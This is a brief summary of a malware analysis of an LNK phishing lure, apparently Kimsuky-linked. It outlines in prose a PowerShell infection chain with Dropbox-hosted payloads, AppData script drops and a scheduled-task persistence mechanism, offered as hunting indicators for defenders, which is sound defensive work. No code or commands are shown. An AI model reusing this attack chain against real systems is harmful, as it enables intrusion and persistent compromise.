The Korean malware write-up analyzes an LNK lure named as a North Korea flood interview request and assesses it as likely Kimsuky-related, while explicitly noting the attribution is an estimate. The shortcut masquerades as a PDF and launches hidden PowerShell with execution-policy bypass and a Base64-encoded command. Decoded logic downloads a decoy DOCX and staged PowerShell payloads from Dropboxusercontent URLs, writes scripts such as user.ps1, OperaUpdate.ps1, board_first.ps1, and temp0748634889.ps1 under AppData, executes them, and deletes temporary files. Persistence is created through a hidden scheduled task named OperaUpdate 22-15454342-7.28 that reruns OperaUpdate.ps1 every 30 minutes, giving defenders concrete file paths, task names, hashes, and cloud-delivery patterns to hunt.